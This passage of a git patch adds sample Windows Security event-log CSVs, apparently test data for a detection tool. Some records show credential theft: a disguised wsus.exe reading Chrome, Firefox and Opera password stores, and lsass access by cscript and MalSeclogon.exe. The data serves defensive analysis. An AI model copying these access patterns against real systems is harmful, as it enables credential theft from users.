S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452819 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452818 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452817 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + 
+ + 452816 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452815 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452814 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452813 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + 
+ 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452922 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452921 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452920 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452919 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452918 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452917 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452916 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452915 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452914 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452913 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452912 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452911 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + 
%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452910 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452909 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452908 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452907 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452906 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + 
S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" -- 2.34.1 From ad128638e52ffad56e8cb5223d1ea46b1144c65e Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:43:47 +0800 Subject: [PATCH 06/13] ADD file via upload --- .../Sample_Process_Execution_Events.csv | 4130 +++++++++++++++++ 1 file changed, 4130 insertions(+) create mode 100644 source/samples/Sample_Process_Execution_Events.csv diff --git a/source/samples/Sample_Process_Execution_Events.csv b/source/samples/Sample_Process_Execution_Events.csv new file mode 100644 index 0000000..9b38ae6 --- /dev/null +++ b/source/samples/Sample_Process_Execution_Events.csv 
@@ -0,0 +1,4130 @@ +DateTime,timestamp,EventID,ProcessName,User,ParentProcessName,RawLog +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + 
\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + 
C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + 
+ + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 
